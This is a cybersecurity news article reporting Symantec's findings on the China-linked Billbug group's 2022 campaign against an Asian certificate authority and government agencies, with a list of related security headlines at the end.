16 November 2022

Chinese hackers breached certificate authority


Chinese hackers breached certificate authority

China-based state-sponsored hackers compromised an unnamed certificate authority and several government and defense agencies in several Asian countries. In at least one instance a large number of machines on the network belonging to a government agency were breached, according to the Broadcom’s Symantec threat hunter team.

“The targeting of a certificate authority is notable, as if the attackers were able to successfully compromise it to access certificates they could potentially use them to sign malware with a valid certificate, and help it avoid detection on victim machines. It could also potentially use compromised certificates to intercept HTTPS traffic,” Symantec said, adding that they found no evidence that the threat actors were successful in compromising digital certificates.

Known as Billbug, Lotus Blossom, or Thrip, the group has been active since at least 2009 and is known to focus on targets in Asian countries.

“The ability of this actor to compromise multiple victims at once indicates that this threat group remains a skilled and well-resourced operator that is capable of carrying out sustained and wide-ranging campaigns,” Symantec researchers wrote. “Billbug also appears to be undeterred by the possibility of having this activity attributed to it, with it reusing tools that have been linked to the group in the past.”

In the latest campaign, which has been ongoing since March 2022, the attackers gained initial access to victims’ networks by exploiting public-facing applications. The attackers also used multiple dual-use tools like AdFind, Certutil, and PortScanner, as well as the custom Hannotog and Sagerunex backdoors that were seen in the past Billbug’s campaigns.

“While we do not see data being exfiltrated in this campaign, Billbug is widely regarded as being an espionage actor, indicating that data theft is the most likely motivation in this campaign. The victims in this campaign – government agencies and a certificate authority – also point to an espionage and data-theft motive. The targeting of the government victims is most likely driven by espionage motivations, with the certificate authority likely targeted in order to steal legitimate digital certificates,” Symantec said.


Back to the list

Latest Posts

North Korean hackers caught collaborating with Play ransomware

North Korean hackers caught collaborating with Play ransomware

The theory is that Andariel is either working as an affiliate of Play ransomware or serving as an initial access broker.
31 October 2024
Large-scale phishing campaign targeting Ukraine's taxpayers

Large-scale phishing campaign targeting Ukraine's taxpayers

The attack deploys the Litemanager RMT, which provides unauthorized access to the infected computer.
30 October 2024
Ongoing malvertising campaign hijacks Facebook accounts to distribute SYS01Stealer malware

Ongoing malvertising campaign hijacks Facebook accounts to distribute SYS01Stealer malware

Threat actors use Meta’s platform to promote fake advertisements for popular software tools.
30 October 2024